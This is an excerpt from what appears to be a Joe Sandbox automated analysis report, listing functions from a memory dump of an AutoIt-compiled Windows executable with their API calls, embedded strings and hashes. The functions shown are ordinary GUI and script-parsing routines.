Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 24556fbb4628761d77b4e03cb36a36143894e002bb7cb90228cbd1910392f46d
Instruction ID: 6b46cb8883a41f4cd90cef7a81824b711974419c576d7c28ca6f5912891984d7
Opcode Fuzzy Hash: 24556fbb4628761d77b4e03cb36a36143894e002bb7cb90228cbd1910392f46d
Instruction Fuzzy Hash: EA51A430248305AF8610FF15C89383AB7A1EB54744B678D19F586E7291E760DE49DF72

Function 00D4C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D4C741
__wcsnicmp.LIBCMT ref: 00D4C759
__wcsnicmp.LIBCMT ref: 00D4C771
__wcsnicmp.LIBCMT ref: 00D4C789
__wcsnicmp.LIBCMT ref: 00D4C7A1
__wcsnicmp.LIBCMT ref: 00D4C7B5
__wcsnicmp.LIBCMT ref: 00D4C7C9
__wcsnicmp.LIBCMT ref: 00D4C7E1
__wcsnicmp.LIBCMT ref: 00D4C8B2
__wcsnicmp.LIBCMT ref: 00D4C8C6
__wcsnicmp.LIBCMT ref: 00D4C8DA
__wcsnicmp.LIBCMT ref: 00D4C8EE

Strings

Cannot parse #include, xrefs: 00DB3482
#include, xrefs: 00D4C7AF
#comments-end, xrefs: 00D4C8D4
Bad directive syntax error, xrefs: 00DB346D
#requireadmin, xrefs: 00D4C76B
#notrayicon, xrefs: 00D4C753
#OnAutoItStartRegister, xrefs: 00D4C783
Unterminated group of comments, xrefs: 00DB3475
#comments-start, xrefs: 00D4C7C3, 00D4C8AC
#pragma compile, xrefs: 00D4C73B
#include-once, xrefs: 00D4C79B
#ce, xrefs: 00D4C8E8
#cs, xrefs: 00D4C7DB, 00D4C8C0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: f5f7069eb06296edd4f0415e1df76fa321d03ab8cb00700e749180ff0481bba1
Instruction ID: 1f5f7d2b04c0f6e9a7179c7d895f7e8c75846375ccb4b9abdcb59f6819c23c4f
Opcode Fuzzy Hash: f5f7069eb06296edd4f0415e1df76fa321d03ab8cb00700e749180ff0481bba1
Instruction Fuzzy Hash: 15613931651716BBDF71AA248C83FBA339DEF15740F181025FD86AA2C2EF60DA05D6B1

Function 00D448C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00D44956
DeleteObject.GDI32(00000000), ref: 00D44998
DeleteObject.GDI32(00000000), ref: 00D449A3
DestroyCursor.USER32(00000000), ref: 00D449AE
DestroyWindow.USER32(00000000), ref: 00D449B9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00DBE179
6FDA0200.COMCTL32(?,000000FF,?), ref: 00DBE1B2
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00DBE5E0

Part of subcall function 00D449CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D44954,00000000), ref: 00D44A23

SendMessageW.USER32 ref: 00DBE627
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DBE63E

Strings

0, xrefs: 00DBE474

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
String ID: 0
API String ID: 377055139-4108050209
Opcode ID: eaa605794dc09be13ea49ed5b3e0fd135c1825c056ffb0979d62cfc35531ca20
Instruction ID: 8a65b10f152ff256375dfa765deffac3da1d918823495b6bba939f54ad950438
Opcode Fuzzy Hash: eaa605794dc09be13ea49ed5b3e0fd135c1825c056ffb0979d62cfc35531ca20
Instruction Fuzzy Hash: 97127A30600212DFDB24CF28C984BEABBE5FF45305F584569E59ADB262C731E885DBB1

Function 00DAC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00DAC598
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00DAC64E
SendMessageW.USER32(?,00001102,00000002,?), ref: 00DAC669
SendMessageW.USER32(?,000000F1,?,00000000), ref: 00DAC925

Strings

0, xrefs: 00DAC6AC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 7d22b8e98ade14af86ff8835340f9f5f5180e9e00c99da68a3b6580c8d770c79
Instruction ID: f3b3d88fff3ee8d0fa3858784ea743880636fac95ada44c43155cb561ea29ca9
Opcode Fuzzy Hash: 7d22b8e98ade14af86ff8835340f9f5f5180e9e00c99da68a3b6580c8d770c79
Instruction Fuzzy Hash: A6F1F371115302AFE715CF28CC85BAABBE5FF4A364F081A29F584D62A1C774D944CBB2

Function 00DA6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00DDDBF0), ref: 00DA6245

Strings

GETSELECTED, xrefs: 00DA64BD
FINDSTRING, xrefs: 00DA6392
SENDCOMMANDID, xrefs: 00DA65C6
CHECK, xrefs: 00DA6487
TABLEFT, xrefs: 00DA62A3
SETCURRENTSELECTION, xrefs: 00DA63D2
EDITPASTE, xrefs: 00DA6557
ISVISIBLE, xrefs: 00DA6251
SELECTSTRING, xrefs: 00DA6422
GETLINECOUNT, xrefs: 00DA64E0
UNCHECK, xrefs: 00DA649D
TABRIGHT, xrefs: 00DA62B9
ISENABLED, xrefs: 00DA6288
GETLINE, xrefs: 00DA6587
GETCURRENTCOL, xrefs: 00DA6520
CURRENTTAB, xrefs: 00DA62D9
GETCURRENTLINE, xrefs: 00DA6500
HIDEDROPDOWN, xrefs: 00DA631C
SHOWDROPDOWN, xrefs: 00DA62FC
ISCHECKED, xrefs: 00DA6455
DELSTRING, xrefs: 00DA6365
ADDSTRING, xrefs: 00DA6332
GETCURRENTSELECTION, xrefs: 00DA63FF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 44a12a494ffeb662be097a0072f02edfb15b564f6dc82e5cfb90dee8c4afba13
Instruction ID: 7f1a4f5c9e5db01e64c9fd3154227eb131998a2925ffa22a776e55b3f07b5c5d
Opcode Fuzzy Hash: 44a12a494ffeb662be097a0072f02edfb15b564f6dc82e5cfb90dee8c4afba13
Instruction Fuzzy Hash: 20C15074204201CFCA04EF14C461A6E7796EF96394F0D8869BD865B3A6DB21DD4ECBB2

Function 00DAD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00DAD3BE
SetTextColor.GDI32(?,?), ref: 00DAD3C2
GetSysColorBrush.USER32(0000000F), ref: 00DAD3D8
GetSysColor.USER32(0000000F), ref: 00DAD3E3
CreateSolidBrush.GDI32(?), ref: 00DAD3E8
GetSysColor.USER32(00000011), ref: 00DAD400
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DAD40E
SelectObject.GDI32(?,00000000), ref: 00DAD41F
SetBkColor.GDI32(?,00000000), ref: 00DAD428
SelectObject.GDI32(?,?), ref: 00DAD435
InflateRect.USER32(?,000000FF,000000FF), ref: 00DAD454
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DAD46B
GetWindowLongW.USER32(00000000,000000F0), ref: 00DAD480
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DAD4A8
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DAD4CF
InflateRect.USER32(?,000000FD,000000FD), ref: 00DAD4ED
DrawFocusRect.USER32(?,?), ref: 00DAD4F8
GetSysColor.USER32(00000011), ref: 00DAD506
SetTextColor.GDI32(?,00000000), ref: 00DAD50E
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DAD522
SelectObject.GDI32(?,00DAD0B5), ref: 00DAD539
DeleteObject.GDI32(?), ref: 00DAD544
SelectObject.GDI32(?,?), ref: 00DAD54A
DeleteObject.GDI32(?), ref: 00DAD54F
SetTextColor.GDI32(?,?), ref: 00DAD555
SetBkColor.GDI32(?,?), ref: 00DAD55F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 10f7d3ec434e7ae303a1cac63b2988eee32b7a3ca033e53b05edd6a4481f2d28
Instruction ID: 7c272b3b90d9810fd8bc1cd9956fc4b024328bcf50203dcb5a669793c8a2cc00
Opcode Fuzzy Hash: 10f7d3ec434e7ae303a1cac63b2988eee32b7a3ca033e53b05edd6a4481f2d28
Instruction Fuzzy Hash: C6513D7190020AAFDF109FA8DC48EAEBBBAFF09320F144525F915EB2A1D7759940DB60

Function 00DAB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DAB5C0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DAB5D1
CharNextW.USER32(0000014E), ref: 00DAB600
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DAB641
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DAB657
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DAB668
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DAB685
SetWindowTextW.USER32(?,0000014E), ref: 00DAB6D7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DAB6ED
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DAB71E
_memset.LIBCMT ref: 00DAB743
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DAB78C
_memset.LIBCMT ref: 00DAB7EB
SendMessageW.USER32 ref: 00DAB815
SendMessageW.USER32(?,00001074,?,00000001), ref: 00DAB86D
SendMessageW.USER32(?,0000133D,?,?), ref: 00DAB91A
InvalidateRect.USER32(?,00000000,00000001), ref: 00DAB93C
GetMenuItemInfoW.USER32(?), ref: 00DAB986
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DAB9B3
DrawMenuBar.USER32(?), ref: 00DAB9C2
SetWindowTextW.USER32(?,0000014E), ref: 00DAB9EA

Strings

0, xrefs: 00DAB95F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: c7fc9d5a9282e12ebd869f69e42b219413ca8b0fc51036b70212274548fc6081
Instruction ID: fa95e9bef8abc0de1ef3ee5a3b01d4b3b08ebce54d3ccf394f7b11c42c326667
Opcode Fuzzy Hash: c7fc9d5a9282e12ebd869f69e42b219413ca8b0fc51036b70212274548fc6081
Instruction Fuzzy Hash: 2CE17E75900209AFDB109F90CC84EEE7BB9FF06724F148156F955AB292DB748A82DF70

Function 00DA744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DA7587
GetDesktopWindow.USER32 ref: 00DA759C
GetWindowRect.USER32(00000000), ref: 00DA75A3
GetWindowLongW.USER32(?,000000F0), ref: 00DA7605
DestroyWindow.USER32(?), ref: 00DA7631
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DA765A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA7678
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DA769E
SendMessageW.USER32(?,00000421,?,?), ref: 00DA76B3
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DA76C6
IsWindowVisible.USER32(?), ref: 00DA76E6
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DA7701
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DA7715
GetWindowRect.USER32(?,?), ref: 00DA772D
MonitorFromPoint.USER32(?,?,00000002), ref: 00DA7753
GetMonitorInfoW.USER32 ref: 00DA776D
CopyRect.USER32(?,?), ref: 00DA7784
SendMessageW.USER32(?,00000412,00000000), ref: 00DA77EF

Strings

0, xrefs: 00DA7532
tooltips_class32, xrefs: 00DA7653
(, xrefs: 00DA7762

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c990e36388abe3742512367ff28399344ad4b83df2ac06df1ea74cccd0350c46
Instruction ID: 09ae0b380710cde949186f2239c1c39d012aa0a0906d13cc1ae05f445eabf533
Opcode Fuzzy Hash: c990e36388abe3742512367ff28399344ad4b83df2ac06df1ea74cccd0350c46
Instruction Fuzzy Hash: 48B18B71608341AFDB44DF68CD48B6ABBE5FF89310F04891DF5999B291DB70E805CBA2

Function 00D5A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D5A839
GetSystemMetrics.USER32(00000007), ref: 00D5A841
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D5A86C
GetSystemMetrics.USER32(00000008), ref: 00D5A874
GetSystemMetrics.USER32(00000004), ref: 00D5A899
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D5A8B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00D5A8C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D5A8F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D5A90D
GetClientRect.USER32(00000000,000000FF), ref: 00D5A92B
GetStockObject.GDI32(00000011), ref: 00D5A947
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5A952

Part of subcall function 00D5B736: GetCursorPos.USER32(000000FF), ref: 00D5B749
Part of subcall function 00D5B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D5B766
Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000001), ref: 00D5B78B
Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000002), ref: 00D5B799

SetTimer.USER32(00000000,00000000,00000028,00D5ACEE), ref: 00D5A979

Strings

AutoIt v3 GUI, xrefs: 00D5A8F1

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 750d9fa377c51a32def167d128d68505c6d06eefc030bd3ff1c56f398993f849
Instruction ID: 189d970dd9d26ce7ac77d20e7dc077ee65fbb4986101302af057118b95fa95dd
Opcode Fuzzy Hash: 750d9fa377c51a32def167d128d68505c6d06eefc030bd3ff1c56f398993f849
Instruction Fuzzy Hash: 4BB16735A0021AEFDB14DFA8CC45BEA7BA5EB48315F104229FA16EB290DB30D944CB61

Function 00DA69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DA6A52
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DA6B12

Strings

GETSELECTED, xrefs: 00DA6C38
SELECTCLEAR, xrefs: 00DA6B89
ISSELECTED, xrefs: 00DA6B1D
DESELECT, xrefs: 00DA6BF8
SELECTINVERT, xrefs: 00DA6BDA
SELECT, xrefs: 00DA6BA4
GETITEMCOUNT, xrefs: 00DA6A80
FINDITEM, xrefs: 00DA6C7D
GETSUBITEMCOUNT, xrefs: 00DA6A9D
GETTEXT, xrefs: 00DA6ABB
SELECTALL, xrefs: 00DA6B71
GETSELECTEDCOUNT, xrefs: 00DA6AF5
VIEWCHANGE, xrefs: 00DA6CC9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 1511a2e4b02481d9baac95c62ee0104cdb3e5614ce91825625389423a0a80bf2
Instruction ID: 628998d6ff233eaa33d3686ac53509ff39a91c072eae74c3b4ef0e3a1d5148dc
Opcode Fuzzy Hash: 1511a2e4b02481d9baac95c62ee0104cdb3e5614ce91825625389423a0a80bf2
Instruction Fuzzy Hash: E9A14E70214201DFCB04EF24C951A6AB7A6EF45364F18896DBD969B3D2EB30ED09CB71

Function 00D7E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00D7E6E1
_wcscmp.LIBCMT ref: 00D7E6F2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00D7E71A
CharUpperBuffW.USER32(?,00000000), ref: 00D7E737
_wcscmp.LIBCMT ref: 00D7E755
_wcsstr.LIBCMT ref: 00D7E766
GetClassNameW.USER32(00000018,?,00000400), ref: 00D7E79E
_wcscmp.LIBCMT ref: 00D7E7AE
GetWindowTextW.USER32(00000002,?,00000400), ref: 00D7E7D5
GetClassNameW.USER32(00000018,?,00000400), ref: 00D7E81E
_wcscmp.LIBCMT ref: 00D7E82E
GetClassNameW.USER32(00000010,?,00000400), ref: 00D7E856
GetWindowRect.USER32(00000004,?), ref: 00D7E8BF

Strings

ThumbnailClass, xrefs: 00D7E7A9, 00D7E829
@, xrefs: 00D7E6BC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: b49dbdccf2670cdcc8f5dca7a2401168eccf9219db1a4b6dbdfd74fdc2d92716
Instruction ID: ec15acb1175323c48b296f91b6ba381f80853c588418a0593eb317cab36f3642
Opcode Fuzzy Hash: b49dbdccf2670cdcc8f5dca7a2401168eccf9219db1a4b6dbdfd74fdc2d92716
